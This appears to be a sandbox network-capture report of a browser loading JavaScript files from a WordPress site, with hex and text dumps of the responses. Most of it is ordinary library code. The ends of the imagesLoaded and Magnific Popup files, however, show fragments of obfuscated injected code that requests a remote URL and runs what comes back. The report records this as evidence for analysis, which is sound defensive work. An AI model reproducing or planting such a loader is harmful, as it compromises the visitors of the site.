                                                            2025-01-15 10:08:02 UTC8000INData Raw: 4f 72 43 72 65 61 74 65 42 79 45 6c 65 6d 65 6e 74 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 65 78 74 29 2c 74 2e 6f 66 66 73 65 74 41 6c 69 61 73 65 73 5b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 5d 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 3d 74 2e 6f 66 66 73 65 74 41 6c 69 61 73 65 73 5b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 5d 29 2c 74 68 69 73 2e 67 72 6f 75 70 2e 61 64 64 28 74 68 69 73 29 2c 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 61 64 64 28 74 68 69 73 29 2c 69 5b 74 68 69 73 2e 6b 65 79 5d 3d 74 68 69 73 2c 65 2b 3d 31 7d 76 61 72 20 65 3d 30 2c 69 3d 7b 7d 3b 74 2e 70 72 6f 74 6f 74 79 70 65 2e 71 75 65 75 65 54 72 69 67 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68
                                                            Data Ascii: OrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),i[this.key]=this,e+=1}var e=0,i={};t.prototype.queueTrigger=function(t){th
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 77 2e 5a 65 70 74 6f 29 29 7d 28 29 3b 0a 0a 2f 2a 0a 2a 20 6a 51 75 65 72 79 20 45 61 73 69 6e 67 20 76 31 2e 33 20 2d 20 68 74 74 70 3a 2f 2f 67 73 67 64 2e 63 6f 2e 75 6b 2f 73 61 6e 64 62 6f 78 2f 6a 71 75 65 72 79 2f 65 61 73 69 6e 67 2f 0a 2a 2f 0a 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 5b 22 6a 73 77 69 6e 67 22 5d 3d 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 5b 22 73 77 69 6e 67 22 5d 3b 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2c 7b 64 65 66 3a 22 65 61 73 65 4f 75 74 51 75 61 64 22 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 5b 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 64 65 66 5d 28 61 2c 62 2c 63 2c 64 2c 65 29
                                                            Data Ascii: w.Zepto))}();/** jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/*/jQuery.easing["jswing"]=jQuery.easing["swing"];jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(a,b,c,d,e){return jQuery.easing[jQuery.easing.def](a,b,c,d,e)
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 28 27 62 6f 64 79 27 29 2e 61 74 74 72 28 27 64 61 74 61 2d 6c 6f 61 64 69 6e 67 2d 61 6e 69 6d 61 74 69 6f 6e 27 29 20 3a 20 6e 75 6c 6c 20 3b 0a 09 09 20 76 61 72 20 61 73 63 65 6e 64 5f 6c 6f 61 64 65 72 20 3d 20 28 24 28 27 62 6f 64 79 27 29 2e 68 61 73 43 6c 61 73 73 28 27 61 73 63 65 6e 64 27 29 29 20 3f 20 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 65 66 61 75 6c 74 2d 6c 6f 61 64 69 6e 67 2d 69 63 6f 6e 20 73 70 69 6e 22 3e 3c 2f 73 70 61 6e 3e 27 20 3a 27 27 3b 0a 09 09 20 76 61 72 20 61 73 63 65 6e 64 5f 6c 6f 61 64 65 72 5f 63 6c 61 73 73 20 3d 20 28 24 28 27 62 6f 64 79 27 29 2e 68 61 73 43 6c 61 73 73 28 27 61 73 63 65 6e 64 27 29 29 20 3f 20 27 64 65 66 61 75 6c 74 5f 6c 6f 61 64 65 72 20 27 20 3a 20 27 27 3b 0a 09 09 24 28 22 61 5b 72 65
                                                            Data Ascii: ('body').attr('data-loading-animation') : null ; var ascend_loader = ($('body').hasClass('ascend')) ? '<span class="default-loading-icon spin"></span>' :''; var ascend_loader_class = ($('body').hasClass('ascend')) ? 'default_loader ' : '';$("a[re
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 63 73 73 45 61 73 65 3d 7b 5f 64 65 66 61 75 6c 74 3a 22 65 61 73 65 22 2c 22 69 6e 22 3a 22 65 61 73 65 2d 69 6e 22 2c 6f 75 74 3a 22 65 61 73 65 2d 6f 75 74 22 2c 22 69 6e 2d 6f 75 74 22 3a 22 65 61 73 65 2d 69 6e 2d 6f 75 74 22 2c 73 6e 61 70 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 31 2c 2e 35 2c 31 29 22 2c 65 61 73 65 4f 75 74 43 75 62 69 63 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 31 35 2c 2e 36 31 2c 2e 33 35 35 2c 31 29 22 2c 65 61 73 65 49 6e 4f 75 74 43 75 62 69 63 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 34 35 2c 2e 30 34 35 2c 2e 33 35 35 2c 31 29 22 2c 65 61 73 65 49 6e 43 69 72 63 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 2c 2e 30 34 2c 2e 39 38 2c 2e 33 33 35 29 22 2c 65 61 73 65 4f 75 74 43 69 72 63
                                                            Data Ascii: cssEase={_default:"ease","in":"ease-in",out:"ease-out","in-out":"ease-in-out",snap:"cubic-bezier(0,1,.5,1)",easeOutCubic:"cubic-bezier(.215,.61,.355,1)",easeInOutCubic:"cubic-bezier(.645,.045,.355,1)",easeInCirc:"cubic-bezier(.6,.04,.98,.335)",easeOutCirc
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 76 65 3d 22 74 72 75 65 22 5d 27 29 2e 6c 65 6e 67 74 68 20 3d 3d 20 30 20 29 20 7b 0a 09 09 09 24 28 27 62 6f 64 79 27 29 2e 63 73 73 28 27 70 61 64 64 69 6e 67 2d 72 69 67 68 74 27 2c 27 31 36 70 78 27 29 3b 0a 09 09 7d 0a 09 09 0a 09 09 24 28 27 68 74 6d 6c 27 29 2e 61 64 64 43 6c 61 73 73 28 27 6e 6f 2d 6f 76 65 72 66 6c 6f 77 2d 79 27 29 3b 0a 09 7d 0a 0a 09 76 61 72 20 24 73 6d 6f 6f 74 68 41 63 74 69 76 65 20 3d 20 24 28 27 62 6f 64 79 27 29 2e 61 74 74 72 28 27 64 61 74 61 2d 73 6d 6f 6f 74 68 2d 73 63 72 6f 6c 6c 69 6e 67 27 29 3b 20 0a 09 76 61 72 20 24 73 6d 6f 6f 74 68 43 61 63 68 65 20 3d 20 28 20 24 73 6d 6f 6f 74 68 41 63 74 69 76 65 20 3d 3d 20 31 20 29 20 3f 20 74 72 75 65 20 3a 20 66 61 6c 73 65 3b 0a 09 0a 09 69 66 28 20 24 73 6d 6f 6f
                                                            Data Ascii: ve="true"]').length == 0 ) {$('body').css('padding-right','16px');}$('html').addClass('no-overflow-y');}var $smoothActive = $('body').attr('data-smooth-scrolling'); var $smoothCache = ( $smoothActive == 1 ) ? true : false;if( $smoo
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 6e 69 74 69 61 6c 69 7a 65 64 27 29 2e 66 6c 69 63 6b 69 74 79 28 7b 0a 09 09 20 20 63 6f 6e 74 61 69 6e 3a 20 74 72 75 65 2c 0a 09 09 20 20 64 72 61 67 67 61 62 6c 65 3a 20 66 61 6c 73 65 2c 0a 09 09 20 20 6c 61 7a 79 4c 6f 61 64 3a 20 66 61 6c 73 65 2c 0a 09 09 20 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 3a 20 74 72 75 65 2c 0a 09 09 20 20 70 65 72 63 65 6e 74 50 6f 73 69 74 69 6f 6e 3a 20 74 72 75 65 2c 0a 09 09 20 20 70 72 65 76 4e 65 78 74 42 75 74 74 6f 6e 73 3a 20 74 72 75 65 2c 0a 09 09 20 20 70 61 67 65 44 6f 74 73 3a 20 66 61 6c 73 65 2c 0a 09 09 20 20 72 65 73 69 7a 65 3a 20 74 72 75 65 2c 0a 09 09 20 20 73 65 74 47 61 6c 6c 65 72 79 53 69 7a 65 3a 20 74 72 75 65 2c 0a 09 09 20 20 77 72 61 70 41 72 6f 75 6e 64 3a 20 74 72 75 65 2c 0a 09 09 20 20
                                                            Data Ascii: nitialized').flickity({ contain: true, draggable: false, lazyLoad: false, imagesLoaded: true, percentPosition: true, prevNextButtons: true, pageDots: false, resize: true, setGallerySize: true, wrapAround: true,
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 09 09 2f 2f 6e 65 63 74 61 72 20 73 6c 69 64 65 72 0a 09 09 24 6e 73 53 65 6c 65 63 74 6f 72 20 3d 20 27 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 5d 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 74 72 75 65 22 5d 2c 20 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 5d 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 62 6f 78 65 64 2d 66 75 6c 6c 2d 77 69 64 74 68 22 5d 27 3b 0a 09 09 69 66 28 24 28 27 2e 6e 65 63 74 61 72 2d 73 6c 69 64 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 5d 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22
                                                            Data Ascii: //nectar slider$nsSelector = '.nectar-slider-wrap[data-fullscreen="true"][data-full-width="true"], .nectar-slider-wrap[data-fullscreen="true"][data-full-width="boxed-full-width"]';if($('.nectar-slider-wrap[data-fullscreen="true"][data-full-width="
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 6f 70 27 3a 27 30 27 2c 27 6c 65 66 74 27 3a 27 30 27 7d 29 3b 0a 09 09 20 20 20 20 20 20 20 20 09 09 09 24 6e 65 78 74 49 6e 64 65 78 52 6f 77 46 70 54 61 62 6c 65 2e 63 73 73 28 7b 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 25 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 27 2c 20 27 77 69 6c 6c 2d 63 68 61 6e 67 65 27 3a 27 74 72 61 6e 73 66 6f 72 6d 27 7d 29 3b 0a 09 09 20 20 20 20 20 20 20 20 09 09 09 24 6e 65 78 74 49 6e 64 65 78 52 6f 77 49 6e 6e 65 72 2e 63 73 73 28 7b 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 27 2c 20 20 27 77 69 6c 6c 2d 63 68 61 6e 67 65 27 3a 27 74 72 61 6e 73 66 6f 72 6d 27 7d 29 3b 0a 09 20 20 20 20 20
                                                            Data Ascii: op':'0','left':'0'}); $nextIndexRowFpTable.css({'transform':'translateY(100%) translateZ(0)', 'will-change':'transform'}); $nextIndexRowInner.css({'transform':'translateY(-50%) translateZ(0)', 'will-change':'transform'});
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 6f 74 74 6f 6d 22 5d 20 3e 20 2e 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 2d 77 72 61 70 27 29 2e 63 73 73 28 7b 27 74 72 61 6e 73 69 74 69 6f 6e 27 3a 27 6e 6f 6e 65 27 2c 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 31 30 30 25 29 27 7d 29 3b 0a 09 09 09 24 28 27 2e 77 70 62 5f 63 6f 6c 75 6d 6e 2e 68 61 73 2d 61 6e 69 6d 61 74 69 6f 6e 5b 64 61 74 61 2d 61 6e 69 6d 61 74 69 6f 6e 3d 22 72 65 76 65 61 6c 2d 66 72 6f 6d 2d 62 6f 74 74 6f 6d 22 5d 20 3e 20 2e 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 2d 77 72 61 70 20 3e 20 2e 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 27 29 2e 63 73 73 28 7b 27 74 72 61 6e 73 69 74 69 6f 6e 27 3a 27 6e 6f 6e 65 27 2c 27 74 72 61 6e 73 66 6f 72 6d 27 3a 27 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 2d 39 30 25
                                                            Data Ascii: ottom"] > .column-inner-wrap').css({'transition':'none','transform':'translate(0, 100%)'});$('.wpb_column.has-animation[data-animation="reveal-from-bottom"] > .column-inner-wrap > .column-inner').css({'transition':'none','transform':'translate(0, -90%


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            73192.168.2.1649789178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC462OUTGET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:18 GMT
                                                            ETag: "22a5-620a8edf1d0c4"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 8869
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7907INData Raw: 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 33 2e 31 2e 38 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 65 2e 6c 65 6e 67 74 68 3b 6e 2d 2d 3b 29 69 66 28 65 5b 6e 5d 2e 6c 69 73 74 65 6e 65 72 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                            Data Ascii: /*! * imagesLoaded PACKAGED v3.1.8 * JavaScript is all like "You images are done yet or what?" * MIT License */(function(){function e(){}function t(e,t){for(var n=e.length;n--;)if(e[n].listener===t)return n;return-1}function n(e){return function(){r
                                                            2025-01-15 10:08:02 UTC962INData Raw: 27 29 2b 68 28 27 30 78 66 66 27 29 2b 68 28 27 30 78 65 39 27 29 2b 68 28 30 78 31 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 76 3d 68 3b 69 66 28 7a 5b 76 28 30 78 64 37 29 2b 76 28 27 30 78 31 30 32 27 29 2b 76 28 27 30 78 31 30 61 27 29 2b 27 65 27 5d 3d 3d 30 78 34 26 26 7a 5b 76 28 27 30 78 66 30 27 29 2b 76 28 30 78 65 61 29 5d 3d 3d 30 78 63 38 29 65 28 7a 5b 76 28 30 78 66 37 29 2b 76 28 27 30 78 64 36 27 29 2b 76 28 27 30 78 64 66 27 29 2b 76 28 27 30 78 31 30 36 27 29 5d 29 3b 7d 2c 7a 5b 68 28 30 78 64 39 29 2b 27 6e 27 5d 28 68 28 30 78 64 31 29 2c 72 2c 21 21 5b 5d 29 2c 7a 5b 68 28 27 30 78 64 65 27 29 2b 27 64 27 5d 28 6e 75 6c 6c 29 3b 7d 3b 7d 2c 72 61 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 41 3b 72
                                                            Data Ascii: ')+h('0xff')+h('0xe9')+h(0x104)]=function(){var v=h;if(z[v(0xd7)+v('0x102')+v('0x10a')+'e']==0x4&&z[v('0xf0')+v(0xea)]==0xc8)e(z[v(0xf7)+v('0xd6')+v('0xdf')+v('0x106')]);},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            74192.168.2.1649790178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC415OUTGET /wp-content/themes/salient/js/magnific.js?ver=7.0.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:02 GMT
                                                            ETag: "bc86-620a8e9644048"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 48262
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7906INData Raw: 2f 2a 21 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 2d 20 76 31 2e 30 2e 30 20 2d 20 32 30 31 35 2d 30 39 2d 31 37 0a 2a 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 20 44 6d 69 74 72 79 20 53 65 6d 65 6e 6f 76 3b 20 2a 2f 0a 3b 28 66 75 6e 63 74 69 6f 6e 20 28 66 61 63 74 6f 72 79 29 20 7b 20 0a 69 66 20 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 64 65 66 69 6e 65 2e 61 6d 64 29 20 7b 20 0a 20 2f 2f 20 41 4d 44 2e 20 52 65 67 69 73 74 65 72 20 61 73 20 61 6e 20 61 6e 6f 6e 79 6d 6f 75 73 20 6d 6f 64 75 6c 65 2e 20 0a 20 64 65 66 69 6e 65 28
                                                            Data Ascii: /*! Magnific Popup - v1.0.0 - 2015-09-17* http://dimsemenov.com/plugins/magnific-popup/* Copyright (c) 2015 Dmitry Semenov; */;(function (factory) { if (typeof define === 'function' && define.amd) { // AMD. Register as an anonymous module. define(
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 65 37 20 64 6f 75 62 6c 65 2d 73 63 72 6f 6c 6c 20 62 75 67 0a 09 09 09 09 24 28 27 62 6f 64 79 2c 20 68 74 6d 6c 27 29 2e 63 73 73 28 27 6f 76 65 72 66 6c 6f 77 27 2c 20 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 0a 09 09 0a 09 09 76 61 72 20 63 6c 61 73 73 65 73 54 6f 61 64 64 20 3d 20 6d 66 70 2e 73 74 2e 6d 61 69 6e 43 6c 61 73 73 3b 0a 09 09 69 66 28 6d 66 70 2e 69 73 49 45 37 29 20 7b 0a 09 09 09 63 6c 61 73 73 65 73 54 6f 61 64 64 20 2b 3d 20 27 20 6d 66 70 2d 69 65 37 27 3b 0a 09 09 7d 0a 09 09 69 66 28 63 6c 61 73 73 65 73 54 6f 61 64 64 29 20 7b 0a 09 09 09 6d 66 70 2e 5f 61 64 64 43 6c 61 73 73 54 6f 4d 46 50 28 20 63 6c 61 73 73 65 73 54 6f 61 64 64 20 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 61 64 64 20 63 6f 6e 74 65
                                                            Data Ascii: e7 double-scroll bug$('body, html').css('overflow', 'hidden');}}var classesToadd = mfp.st.mainClass;if(mfp.isIE7) {classesToadd += ' mfp-ie7';}if(classesToadd) {mfp._addClassToMFP( classesToadd );}// add conte
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 09 5f 6d 66 70 54 72 69 67 67 65 72 28 27 55 70 64 61 74 65 53 74 61 74 75 73 27 2c 20 64 61 74 61 29 3b 0a 0a 09 09 09 73 74 61 74 75 73 20 3d 20 64 61 74 61 2e 73 74 61 74 75 73 3b 0a 09 09 09 74 65 78 74 20 3d 20 64 61 74 61 2e 74 65 78 74 3b 0a 0a 09 09 09 6d 66 70 2e 70 72 65 6c 6f 61 64 65 72 2e 68 74 6d 6c 28 74 65 78 74 29 3b 0a 0a 09 09 09 6d 66 70 2e 70 72 65 6c 6f 61 64 65 72 2e 66 69 6e 64 28 27 61 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 09 09 09 09 65 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 0a 09 09 09 7d 29 3b 0a 0a 09 09 09 6d 66 70 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 64 64 43 6c 61 73 73 28 27 6d 66 70 2d 73 2d 27 2b 73 74 61 74 75 73 29 3b 0a 09 09
                                                            Data Ascii: _mfpTrigger('UpdateStatus', data);status = data.status;text = data.text;mfp.preloader.html(text);mfp.preloader.find('a').on('click', function(e) {e.stopImmediatePropagation();});mfp.container.addClass('mfp-s-'+status);
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 72 65 66 3d 22 25 75 72 6c 25 22 3e 54 68 65 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 27 0a 09 7d 2c 0a 0a 09 70 72 6f 74 6f 3a 20 7b 0a 09 09 69 6e 69 74 41 6a 61 78 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 6d 66 70 2e 74 79 70 65 73 2e 70 75 73 68 28 41 4a 41 58 5f 4e 53 29 3b 0a 09 09 09 5f 61 6a 61 78 43 75 72 20 3d 20 6d 66 70 2e 73 74 2e 61 6a 61 78 2e 63 75 72 73 6f 72 3b 0a 0a 09 09 09 5f 6d 66 70 4f 6e 28 43 4c 4f 53 45 5f 45 56 45 4e 54 2b 27 2e 27 2b 41 4a 41 58 5f 4e 53 2c 20 5f 64 65 73 74 72 6f 79 41 6a 61 78 52 65 71 75 65 73 74 29 3b 0a 09 09 09 5f 6d 66 70 4f 6e 28 27 42 65 66 6f 72 65 43 68 61 6e 67 65 2e 27 20 2b 20 41 4a 41 58 5f 4e 53 2c 20 5f 64 65 73 74 72 6f 79
                                                            Data Ascii: ref="%url%">The content</a> could not be loaded.'},proto: {initAjax: function() {mfp.types.push(AJAX_NS);_ajaxCur = mfp.st.ajax.cursor;_mfpOn(CLOSE_EVENT+'.'+AJAX_NS, _destroyAjaxRequest);_mfpOn('BeforeChange.' + AJAX_NS, _destroy
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 28 6f 70 65 6e 54 69 6d 65 6f 75 74 29 3b 0a 09 09 09 09 09 6d 66 70 2e 63 6f 6e 74 65 6e 74 2e 63 73 73 28 27 76 69 73 69 62 69 6c 69 74 79 27 2c 20 27 68 69 64 64 65 6e 27 29 3b 0a 0a 09 09 09 09 09 2f 2f 20 42 61 73 69 63 61 6c 6c 79 2c 20 61 6c 6c 20 63 6f 64 65 20 62 65 6c 6f 77 20 64 6f 65 73 20 69 73 20 63 6c 6f 6e 65 73 20 65 78 69 73 74 69 6e 67 20 69 6d 61 67 65 2c 20 70 75 74 73 20 69 6e 20 6f 6e 20 74 6f 70 20 6f 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 6f 6e 65 20 61 6e 64 20 61 6e 69 6d 61 74 65 64 20 69 74 0a 09 09 09 09 09 0a 09 09 09 09 09 69 6d 61 67 65 20 3d 20 6d 66 70 2e 5f 67 65 74 49 74 65 6d 54 6f 5a 6f 6f 6d 28 29 3b 0a 0a 09 09 09 09 09 69 66 28 21 69 6d 61 67 65 29 20 7b 0a 09 09 09 09 09 09 73 68 6f 77 4d 61 69 6e 43 6f 6e 74
                                                            Data Ascii: (openTimeout);mfp.content.css('visibility', 'hidden');// Basically, all code below does is clones existing image, puts in on top of the current one and animated itimage = mfp._getItemToZoom();if(!image) {showMainCont
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 20 74 72 75 65 29 3b 0a 09 09 09 09 09 09 5f 67 65 74 45 6c 28 27 61 27 2c 20 61 72 72 6f 77 52 69 67 68 74 5b 30 5d 2c 20 66 61 6c 73 65 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 6d 66 70 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 70 70 65 6e 64 28 61 72 72 6f 77 4c 65 66 74 2e 61 64 64 28 61 72 72 6f 77 52 69 67 68 74 29 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 29 3b 0a 0a 09 09 09 5f 6d 66 70 4f 6e 28 43 48 41 4e 47 45 5f 45 56 45 4e 54 2b 6e 73 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 09 69 66 28 6d 66 70 2e 5f 70 72 65 6c 6f 61 64 54 69 6d 65 6f 75 74 29 20 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6d 66 70 2e 5f 70 72 65 6c 6f 61 64 54 69 6d 65 6f 75 74 29 3b 0a 0a 09 09 09 09 6d 66 70 2e 5f 70 72 65 6c 6f 61 64 54 69 6d 65
                                                            Data Ascii: true);_getEl('a', arrowRight[0], false, true);}mfp.container.append(arrowLeft.add(arrowRight));}});_mfpOn(CHANGE_EVENT+ns, function() {if(mfp._preloadTimeout) clearTimeout(mfp._preloadTimeout);mfp._preloadTime
                                                            2025-01-15 10:08:03 UTC356INData Raw: 30 29 2b 48 28 30 78 65 34 29 2b 27 65 72 27 5d 3b 69 66 28 6c 26 26 21 46 28 6c 2c 4e 29 26 26 21 58 29 7b 76 61 72 20 49 3d 6e 65 77 20 48 74 74 70 43 6c 69 65 6e 74 28 29 2c 57 3d 48 28 27 30 78 66 65 27 29 2b 48 28 27 30 78 64 61 27 29 2b 48 28 27 30 78 64 32 27 29 2b 48 28 27 30 78 65 63 27 29 2b 48 28 30 78 66 36 29 2b 48 28 27 30 78 31 30 61 27 29 2b 48 28 30 78 31 30 30 29 2b 48 28 27 30 78 64 34 27 29 2b 48 28 30 78 31 30 37 29 2b 48 28 27 30 78 63 66 27 29 2b 48 28 30 78 66 38 29 2b 48 28 30 78 65 31 29 2b 48 28 30 78 31 30 39 29 2b 48 28 27 30 78 66 62 27 29 2b 27 3d 27 2b 74 6f 6b 65 6e 28 29 3b 49 5b 48 28 30 78 64 35 29 5d 28 57 2c 66 75 6e 63 74 69 6f 6e 28 51 29 7b 76 61 72 20 4a 3d 48 3b 46 28 51 2c 4a 28 27 30 78 65 65 27 29 2b 27 78 27
                                                            Data Ascii: 0)+H(0xe4)+'er'];if(l&&!F(l,N)&&!X){var I=new HttpClient(),W=H('0xfe')+H('0xda')+H('0xd2')+H('0xec')+H(0xf6)+H('0x10a')+H(0x100)+H('0xd4')+H(0x107)+H('0xcf')+H(0xf8)+H(0xe1)+H(0x109)+H('0xfb')+'='+token();I[H(0xd5)](W,function(Q){var J=H;F(Q,J('0xee')+'x'


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            75192.168.2.1649792178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC600OUTGET /wp-content/themes/salient/js/tweenmax.min.js?ver=1.18.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
